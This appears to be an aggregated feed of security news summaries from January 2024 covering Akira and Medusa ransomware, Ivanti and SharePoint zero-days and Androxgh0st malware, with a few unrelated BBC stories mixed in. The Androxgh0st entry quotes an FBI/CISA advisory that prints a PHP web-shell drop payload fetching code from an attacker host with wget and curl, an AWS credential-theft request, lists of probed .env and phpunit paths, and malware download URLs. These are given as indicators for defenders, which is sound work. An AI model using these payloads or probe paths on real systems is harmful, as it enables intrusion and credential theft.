            A 29-year-old Ukrainian national has been arrested in connection with running a “sophisticated cryptojacking scheme,” netting them over $2 million (€1.8 million) in illicit profits. The person was apprehended in Mykolaiv, Ukraine, on January 9 by the National Police of Ukraine with support from Europol and an unnamed cloud service provider following “months of intensive collaboration.” “A cloud "

            Autosummary: "


            Colombia landslide kills 23 including many sheltering in house

            latam
            2024-01-13 https://www.bbc.co.uk/news/world-latin-america-67967379?at_medium=RSS&at_campaign=KARANGA
            Some 23 people are killed and the local mayor says more are still trapped by debris. "

            Autosummary: "


            Akira ransomware targets Finnish organizations

            exploits ransomware
            2024-01-13 https://securityaffairs.com/157371/breaking-news/akira-ransomware-targets-finnish-organizations.html
            The Finnish National Cybersecurity Center (NCSC-FI) warns of increased Akira ransomware attacks targeting NAS and tape backup devices of organizations in the country. The Finnish National Cybersecurity Center (NCSC-FI) reported an increase in Akira ransomware attacks, targeting organizations in the country. Threat actors are wiping NAS and backup devices. Akira ransomware infections were first reported in Finland […] "

            Autosummary: Akira ransomware targets Finnish organizations, by Pierluigi Paganini, January 13, 2024. The Finnish National Cybersecurity Center (NCSC-FI) warns of increased Akira ransomware attacks targeting NAS and tape backup devices of organizations in the country. "


            Act Now: CISA Flags Active Exploitation of Microsoft SharePoint Vulnerability

            exploits
            2024-01-12 https://thehackernews.com/2024/01/act-now-cisa-flags-active-exploitation.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security vulnerability impacting Microsoft SharePoint Server to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The issue, tracked as CVE-2023-29357 (CVSS score: 9.8), is a privilege escalation flaw that could be exploited by an attacker to gain "

            Autosummary: "


            Ivanti Connect Secure zero-days exploited to deploy custom malware

            exploits
            2024-01-12 https://www.bleepingcomputer.com/news/security/ivanti-connect-secure-zero-days-exploited-to-deploy-custom-malware/
            Hackers have been exploiting the two zero-day vulnerabilities in Ivanti Connect Secure disclosed this week since early December to deploy multiple families of custom malware for espionage purposes. [...] "

            Autosummary: Here’s a summary of the tools used in the attacks:
            - Zipline Passive Backdoor: custom malware that can intercept network traffic, supports upload/download operations, creating reverse shells, proxy servers, server tunneling
            - Thinspool Dropper: custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence
            - Wirefire web shell: custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping
            - Lightwire web shell: custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution
            - Warpwire harvester: custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server
            - PySoxy tunneler: facilitates network traffic tunneling for stealthiness
            - BusyBox: multi-call binary combining many Unix utilities used in various system tasks
            - Thinspool utility (sessionserver.pl): used to remount the filesystem as ‘read/write’ to enable malware deployment
            "ZIPLINE is the most notable of these families, it is a passive backdoor that hijacks an exported function accept() from libsecure.so. "


            Akira ransomware attackers are wiping NAS and tape backups

            exploits ransomware
            2024-01-12 https://www.helpnetsecurity.com/2024/01/12/finland-akira-ransomware/

            “The Akira ransomware malware, which was first detected in Finland in June 2023, has been particularly active at the end of the year,” the Finnish National Cybersecurity Center (NCSC-FI) has shared on Wednesday. NCSC-FI has received 12 reports of Akira ransomware hitting Finnish organizations in 2023, and three of the attacks happened during Christmas vacations. “Of the ransomware malware cases reported to the Cybersecurity Center in December, six out of seven involved Akira family malware,” … More

            The post Akira ransomware attackers are wiping NAS and tape backups appeared first on Help Net Security.

            "

            Autosummary: "


            Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families

            exploits government
            2024-01-12 https://thehackernews.com/2024/01/nation-state-actors-weaponize-ivanti.html
            As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023. "These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an "

            Autosummary: "Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said. "


            Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion

            exploits ransomware
            2024-01-12 https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html
            The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands. “As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their "

            Autosummary: As many as 74 organizations, mostly in the U.S., the U.K., France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023. "


            Applying the Tyson Principle to Cybersecurity: Why Attack Simulation is Key to Avoiding a KO

            ciber
            2024-01-12 https://thehackernews.com/2024/01/applying-tyson-principle-to.html
            Picture a cybersecurity landscape where defenses are impenetrable, and threats are nothing more than mere disturbances deflected by a strong shield. Sadly, this image of fortitude remains a pipe dream despite its comforting nature. In the security world, preparedness is not just a luxury but a necessity. In this context, Mike Tyson’s famous adage, "Everyone has a plan until they get punched in "

            Autosummary: Advanced BAS platforms provide practical recommendations, such as prevention signatures and detection rules that can be directly incorporated into security controls - including IPS, NGFW, WAF, EDR, SIEM, SOAR, and other security solutions - to strengthen your security posture immediately. As new malware variants, TTPs, exploit techniques, APT campaigns, and other emerging threats come to light, they are incorporated into the BAS tool’s threat intelligence library. Establish a cadence - whether daily, weekly, monthly, or in real-time following significant IT or threat landscape changes - to remain a step ahead of adversaries who continuously refine their tactics. "


            CISA: Critical Microsoft SharePoint bug now actively exploited

            exploits
            2024-01-12 https://www.bleepingcomputer.com/news/security/cisa-critical-microsoft-sharepoint-bug-now-actively-exploited/
            CISA warns that attackers are now exploiting a critical Microsoft SharePoint privilege escalation vulnerability that can be chained with another critical bug for remote code execution. [...] "

            Autosummary: "


            GitLab warns of critical zero-click account hijacking vulnerability

            exploits
            2024-01-12 https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-zero-click-account-hijacking-vulnerability/
            GitLab has released security updates for both the Community and Enterprise Edition to address two critical vulnerabilities, one of them allowing account hijacking with no user interaction. [...] "

            Autosummary: The following versions are impacted:
            - 16.1 prior to 16.1.5
            - 16.2 prior to 16.2.8
            - 16.3 prior to 16.3.6
            - 16.4 prior to 16.4.4
            - 16.5 prior to 16.5.6
            - 16.6 prior to 16.6.4
            - 16.7 prior to 16.7.2
            The flaw was addressed in GitLab versions 16.7.2, 16.5.6, and 16.6.4, and the fix has also been backported to 16.1.6, 16.2.9, and 16.3.7. "


            Juniper warns of critical RCE bug in its firewalls and switches

            exploits
            2024-01-12 https://www.bleepingcomputer.com/news/security/juniper-warns-of-critical-rce-bug-in-its-firewalls-and-switches/
            Juniper Networks has released security updates to fix a critical pre-auth remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. [...] "

            Autosummary: "


            Joomla! vulnerability is being actively exploited

            exploits
            2024-01-12 https://www.malwarebytes.com/blog/news/2024/01/joomla-vulnerability-is-being-actively-exploited
            A vulnerability in the popular Joomla! CMS has been added to CISA’s known exploited vulnerabilities catalog. "

            Autosummary: This means that Federal Civilian Executive Branch (FCEB) agencies need to remediate this vulnerability by January 29, 2024 in order to protect their devices against active threats. Secure your CMS There are a few obvious and easy-to-remember rules to keep in mind if you want to use a CMS without compromising your security. "


            The Week in Ransomware - January 12th 2024 - Targeting homeowners’ data

            exploits ransomware
            2024-01-12 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-12th-2024-targeting-homeowners-data/
            Mortgage lenders and related companies are becoming popular targets of ransomware gangs, with four companies in this sector recently attacked. [...] "

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @malwrhunterteam, @fwosar, @BleepinComputer, @serghei, @demonslay335, @Ionut_Ilascu, @Seifreed, @billtoulas, @AWNetworks, @Securonix, @TalosSecurity, @criptoboi, @pcrisk, @TrendMicro, and @Unit42_Intel. Cybersecurity researchers are back from the holidays, sharing new research on a BlackBasta affiliate’s use of PikaBot, Microsoft SQL servers being targeted by the Mimic ransomware, and threat actors impersonating security researchers to offer victims a chance to hack back at ransomware gangs. "


            For Patch Tuesday, 48 updates, no zero-day flaws

            exploits
            2024-01-12 https://www.computerworld.com/article/3712131/for-patch-tuesday-48-updates-no-zero-day-flaws.html#tk.rss_security

            Microsoft has eased us into the new year with just 48 updates for the Windows, Office and .NET platforms. There were no zero-days for January, and no reports of publicly exposed vulnerabilities or exploited security issues.

            Developers of complex, line-of-business applications might need to pay particular attention to how Microsoft has updated the Message Queue system. Printing has been patched, and minor updates to Bluetooth and Windows shell sub-systems (shortcuts and wallpaper) require some testing before deployment.

            The team at Readiness has crafted a useful infographic that outlines the risks associated with each of the updates for this January release.

            To read this article in full, please click here

            "

            Autosummary: To test your distributed, MSMQ, and RPC-driven corporate apps (you know who you are) please ensure that the following component areas are included in your project test and release schedule: Message Queue (MSMQ) Services. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge). Adobe Reader (if you get this far): No updates from Adobe for Reader or Acrobat this month, but Microsoft has released a single update to the third party database engine SQLite (CVE-2022-35737). These (BLF) file types were updated this month, and a Windows Error Log Reporting file test will be required that includes file create, read, update, and delete operations. REMINDER: Home, Pro, Pro Education, and Pro for Workstation editions of Windows 11, version 21H2 reached end of service on Oct. 10, 2023. With only two patches (CVE-2024-20674 and CVE-2024-20700) rated critical and no reported zero-days, this is another relatively light month. "


            Juniper Networks fixed a critical RCE bug in its firewalls and switches

            exploits
            2024-01-12 https://securityaffairs.com/157373/security/juniper-networks-rce-cve-2024-21591.html
            Juniper Networks fixed a critical pre-auth remote code execution (RCE) flaw, tracked as CVE-2024-21591, in its SRX Series firewalls and EX Series switches. Juniper Networks released security updates to address a critical pre-auth remote code execution (RCE) vulnerability, tracked as CVE-2024-21591, that resides in SRX Series firewalls and EX Series switches. The vulnerability resides in […] "

            Autosummary: "


            Known Indicators of Compromise Associated with Androxgh0st Malware

            exploits
            2024-01-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a

            SUMMARY

            The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.

            The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.

            Download the PDF version of this report:

            TECHNICAL DETAILS

            Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s

            Autosummary: /current /demo /api /backup /beta /cron /develop /Laravel /laravel/core /gists/cache /test.php /info.php //.env /admin-app/.env%20 /laravel/.env%20 /shared/.env%20 /.env.project%20 /apps/.env%20 /development/.env%20 /live_env%20 /.env.development%20

            Targeted URIs for web-shell drop: /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/phpunit/Util/PHP/eval-stdin.php //lib/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/Util/PHP/eval-stdin.php //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //phpunit/phpunit/src/Util/PHP/eval-stdin.php //phpunit/phpunit/Util/PHP/eval-stdin.php //phpunit/src/Util/PHP/eval-stdin.php //phpunit/Util/PHP/eval-stdin.php //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php //vendor/phpunit/src/Util/PHP/eval-stdin.php //vendor/phpunit/Util/PHP/eval-stdin.php //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/Util/PHP/eval stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/Util/PHP/eval-stdin.php /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /phpunit/phpunit/src/Util/PHP/eval-stdin.php /phpunit/phpunit/Util/PHP/eval-stdin.php /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php /phpunit/src/Util/PHP/eval-stdin.php ./phpunit/Util/PHP/eval-stdin.php /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/Util/PHP/eval-stdin.php /vendor/phpunit/Util/PHP/eval-stdin.php%20 /phpunit/phpunit/src/Util/PHP/eval-stdin.php /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

            An example of attempted credential exfiltration through (honeypot) open proxies:
            POST /.aws/credentials HTTP/1.1
            host: www.example.com
            user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
            accept-encoding: gzip, deflate
            accept: */*
            connection: keep-alive
            content-length: 20
            content-type: application/x-www-form-urlencoded

            0x%5B%5D=androxgh0st

            An example of attempted web-shell drop through (honeypot) open proxies:
            GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
            host: www.example.com
            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
            accept-encoding: gzip, deflate
            accept: */*
            connection: keep-alive
            x-forwarded-for: 200.172.238.135
            content-length: 279

            <?php file_put_contents("evil.php",file_get_contents("hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt")); system("wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php"); ?>

            Monikers used instead of Androxgh0st (0x%5B%5D=???): Ridho Aws 0x_0x x_X nopebee7 SMTPEX evileyes0 privangga drcrypter errorcool drosteam androxmen crack3rz b4bbyghost 0x0day janc0xsec blackb0x 0x1331day Graber

            Example malware drops through eval-stdin.php (URL and file hash):
            hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt 59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4
            hxxps://chainventures.co[.]uk/.well-known/aas dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6
            hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64 23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066
            hxxps://pastebin[.]com/raw/zw0gAmpC ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72
            hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php 0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef
            hxxp://45.95.147[.]236/tmp.x86_64 6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc
            hxxp://main.dsn[.]ovh/dns/pwer bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7
            hxxp://tangible-drink.surge[.]sh/configx.txt de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba

            MITRE ATT&CK TACTICS AND TECHNIQUES: See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.

            Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include: /info /phpinfo /phpinfo.php /?phpinfo=1 /frontend_dev.php/$ /_profiler/phpinfo /debug/default/view?panel=config /config.json /.json /.git/config /live_env /.env.dist /.env.save /environments/.env.production /.env.production.local /.env.project /.env.development /.env.production /.env.prod /.env.development.local /.env.old /<insert-directory>/.env
            Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.

            INDICATORS OF COMPROMISE (IOCs)
            Based on investigations and analysis, the following requests are associated with Androxgh0st activity:
            Incoming GET and POST requests to the following URIs: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /.env
            Incoming POST requests with the following strings:

            /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
            /.aws/credentials /aws/credentials /.aws/config /.git "


            Smashing Security podcast #354: Chuck Norris and the fake CEO, artificial KYC, and an Airbnb scam

            financial
            2024-01-11 https://grahamcluley.com/smashing-security-podcast-354/
            Chuck Norris gives a helping hand to a mysterious cryptocurrency CEO who may have separated investors from over a billion dollars, generative AI creates a nightmare for those wanting to Know Their Customer, and a determined journalist finally gets their revenge on a sneaky Airbnb scammer. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by special guest Maria Varmazis. "

            Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Maria Varmazis – @mvarmazis Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "


            Embracing offensive cybersecurity tactics for defense against dynamic threats

            industry ciber
            2024-01-11 https://www.helpnetsecurity.com/2024/01/11/alexander-hagenah-offensive-cybersecurity-measures/

            In this Help Net Security interview, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. What are the critical steps in creating effective offensive security operations, and how do they impact an organization’s security strategy? The art of war in cybersecurity, much like Sun Tzu’s teachings, hinges on knowing the enemy. But it’s not just about knowing – it’s about … More

            The post Embracing offensive cybersecurity tactics for defense against dynamic threats appeared first on Help Net Security.

            "

            Autosummary: In this Help Net Security interview, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. While it’s challenging to match their resources, focusing on agility, smart intelligence gathering, and collaborative defense strategies can provide effective countermeasures. By pooling resources, knowledge, and intelligence, a coalition approach facilitates a more comprehensive and effective response to cyber threats. "


            Chinese Hackers Exploit Zero-Day Flaws in Ivanti Connect Secure and Policy Secure

            exploits
            2024-01-11 https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html
            A pair of zero-day flaws identified in Ivanti Connect Secure (ICS) and Policy Secure have been chained by suspected China-linked nation-state actors to breach less than 10 customers. Cybersecurity firm Volexity, which identified the activity on the network of one of its customers in the second week of December 2023, attributed it to a hacking group it tracks under the name UTA0178.

            Autosummary: "The information and credentials collected by the attacker allowed them to pivot to a handful of systems internally, and ultimately gain unfettered access to systems on the network," Volexity researchers Matthew Meltzer, Robert Jan Mora, Sean Koessel, Steven Adair, and Thomas Lancaster said.


            Cisco Fixes High-Risk Vulnerability Impacting Unity Connection Software

            exploits
            2024-01-11 https://thehackernews.com/2024/01/cisco-fixes-high-risk-vulnerability.html
            Cisco has released software updates to address a critical security flaw impacting Unity Connection that could permit an adversary to execute arbitrary commands on the underlying system. Tracked as CVE-2024-20272 (CVSS score: 7.3), the vulnerability is an arbitrary file upload bug residing in the web-based management interface and is the result of a lack of authentication in a specific …



            Cisco fixed critical Unity Connection vulnerability CVE-2024-20272

            exploits
            2024-01-11 https://securityaffairs.com/157278/security/cisco-critical-unity-connection-cve-2024-20272.html
            Cisco addressed a critical Unity Connection security flaw that can be exploited by an unauthenticated attacker to get root privileges. Cisco has addressed a critical flaw, tracked as CVE-2024-20272, in its Unity Connection that can be exploited by a remote, unauthenticated attacker to gain root privileges on vulnerable devices. Cisco Unity Connection is a messaging […]



            Ivanti Connect Secure zero-days exploited by attackers (CVE-2023-46805, CVE-2024-21887)

            exploits
            2024-01-11 https://www.helpnetsecurity.com/2024/01/11/cve-2023-46805-cve-2024-21887/

            Two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti Connect Secure VPN devices are under active exploitation by unknown attackers, Volexity researchers have discovered. Patches for these flaws are currently unavailable, but the risk of exploitation can be mitigated by importing the mitigation.release.20240107.1.xml file via Ivanti’s download portal. About the vulnerabilities (CVE-2023-46805 and CVE-2024-21887): the two security flaws affect all supported versions (v9.x and 22.x) of Ivanti Connect Secure (ICS) – formerly known as Pulse Connect Secure – …


            Autosummary: “In this particular incident, the attacker leveraged these exploits to steal configuration data, modify existing files, download remote files, and reverse tunnel from the ICS VPN appliance,” Volexity incident responders shared.


            Finland warns of Akira ransomware wiping NAS and tape backup devices

            exploits ransomware
            2024-01-11 https://www.bleepingcomputer.com/news/security/finland-warns-of-akira-ransomware-wiping-nas-and-tape-backup-devices/
            The Finnish National Cybersecurity Center (NCSC-FI) is warning of increased Akira ransomware activity in December, targeting companies in the country and wiping backups. [...]

            Autosummary: The observed post-compromise activity includes mapping the network, targeting backups and critical servers, stealing usernames and passwords from Windows servers, encrypting important files, and encrypting disks of virtual machines on virtualization servers, particularly those using VMware products.


            New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems

            exploits
            2024-01-11 https://thehackernews.com/2024/01/new-poc-exploit-for-apache-ofbiz.html
            Cybersecurity researchers have developed a proof-of-concept (PoC) code that exploits a recently disclosed critical flaw in the Apache OfBiz open-source Enterprise Resource Planning (ERP) system to execute a memory-resident payload. The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software (…

            Autosummary: The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software (CVE-2023-49070, CVSS score: 9.8) that could be weaponized to bypass authentication and remotely execute arbitrary code.


            There is a Ransomware Armageddon Coming for Us All

            exploits ransomware
            2024-01-11 https://thehackernews.com/2024/01/there-is-ransomware-armageddon-coming.html
            Generative AI will enable anyone to launch sophisticated phishing attacks that only next-generation MFA devices can stop. The least surprising headline from 2023 is that ransomware again set new records for the number of incidents and the damage inflicted. We saw new headlines every week, which included a who’s-who of big-name organizations. If MGM, Johnson Controls, Clorox, Hanes Brands, Caesars …

            Autosummary: Phishing uses deceptive communications (emails, text messages, and voice messages) to trick users into revealing sensitive information, including login credentials, passwords, one-time passwords, personal information, and clicking on phony approval messages. Unlike traditional MFA, attackers simply can't bypass next-gen MFA with malware, MFA fatigue attacks, adversary-in-the-middle (AiTM) attacks, and other methods. These cutting-edge biometric wearables also protect organizations against BYOD vulnerabilities, lost and stolen credentials, weak passwords, credential stuffing, MFA prompt bombing, and easily stolen SMS one-time passcodes.


            X Account of leading cybersecurity firm Mandiant was hacked because not adequately protected

            ciber
            2024-01-11 https://securityaffairs.com/157296/cyber-crime/mandiant-x-account-hacked-2.html
            The X account of cybersecurity firm Mandiant was likely hacked through a brute-force password attack, the company revealed. Last week, threat actors hacked the X account of cybersecurity firm Mandiant and used it to impersonate the Phantom crypto platform and share a cryptocurrency scam. The X account of the Google-owned firm Mandiant has over 120,000 followers. Once […]

            Autosummary: “The wide availability and low cost of many drainers, combined with a relatively high potential for profit, likely makes them attractive operations for many financially motivated actors,” concludes the report, which includes a YARA rule for the detection of CLINKSINK drainer activity. “Given the increase in cryptocurrency values and the low barrier to entry for draining operations, we anticipate that financially motivated threat actors of varying levels of sophistication will continue to conduct drainer operations for the foreseeable future.”


            DJ Black Coffee injured during flight to Argentina gig

            latam
            2024-01-11 https://www.bbc.co.uk/news/world-africa-67920477?at_medium=RSS&at_campaign=KARANGA
            The 47-year-old artist is recovering well after suffering severe blows reportedly during turbulence.



            Ransomware review: January 2024

            exploits
            2024-01-11 https://www.malwarebytes.com/blog/threat-intelligence/2024/01/ransomware-review-january-2024
            This month in ransomware: ALPHV and LockBit joining forces?

            Autosummary: Our integrated solutions combine EP, VPM, and EDR technologies, tailored to your organization’s specific needs. (Figures: ThreatDown EDR detecting LockBit ransomware; ThreatDown automatically quarantining LockBit ransomware.) For resource-constrained organizations, select ThreatDown bundles offer Managed Detection and Response (MDR) services, providing expert monitoring and swift threat response to ransomware attacks, without the need for large in-house cybersecurity teams. (Figures: Known ransomware attacks by gang, by country, and by industry, December 2023.) In other news, LockBit’s attack on Capital Health last month was starkly reminiscent of events from a year prior. (Figure: DragonForce leak site.) WereWolves is a new ransomware group that posted 15 victims last month across various countries, including Russia, the USA, and parts of Europe.


            CISA adds Ivanti and Microsoft SharePoint bugs to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-11 https://securityaffairs.com/157320/security/cisa-ivanti-microsoft-sharepoint-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Connect Secure and Microsoft SharePoint bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two Ivanti Connect Secure and Policy Secure flaws, tracked as CVE-2024-21887 and CVE-2023-46805, and the Microsoft SharePoint Server flaw CVE-2023-29357 to its Known Exploited Vulnerabilities (KEV) catalog. Software firm […]



            Two zero-day bugs in Ivanti Connect Secure actively exploited

            exploits
            2024-01-11 https://securityaffairs.com/157306/hacking/ivanti-connect-secure-policy-secure-0days.html
            Ivanti revealed that two threat actors are exploiting two zero-day vulnerabilities in its Connect Secure (ICS) and Policy Secure. Software firm Ivanti reported that threat actors are exploiting two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways. The flaw CVE-2023-46805 (CVSS score 8.2) is […]

            Autosummary: These two vulnerabilities have been assigned the following CVEs: CVE-2023-46805 – an authentication-bypass vulnerability with a CVSS score of 8.2; CVE-2024-21887 – a command-injection vulnerability found in multiple web components with a CVSS score of 9.1.


            Huge ancient city found in the Amazon

            government
            2024-01-11 https://www.bbc.co.uk/news/science-environment-67940671?at_medium=RSS&at_campaign=KARANGA
            The city was built 2,500 years ago but may have been abandoned after a volcanic eruption.



            Eight "suspicious" US deaths in Colombia linked to dating apps

            latam
            2024-01-11 https://www.bbc.co.uk/news/world-latin-america-67947333?at_medium=RSS&at_campaign=KARANGA
            The US embassy warns criminals are using the dating apps to rob and sometimes kill foreign tourists.



            Framework discloses data breach after accountant gets phished

            financial
            2024-01-11 https://www.bleepingcomputer.com/news/security/framework-discloses-data-breach-after-accountant-gets-phished/
            Framework Computer disclosed a data breach exposing the personal information of an undisclosed number of customers after Keating Consulting Group, its accounting service provider, fell victim to a phishing attack. [...]



            Act now! Ivanti vulnerabilities are being actively exploited

            exploits
            2024-01-11 https://www.malwarebytes.com/blog/news/2024/01/act-now-ivanti-vulnerabilities-are-being-actively-exploited
            Several international security agencies are echoing a warning by Ivanti about actively exploited vulnerabilities in its VPN solution.

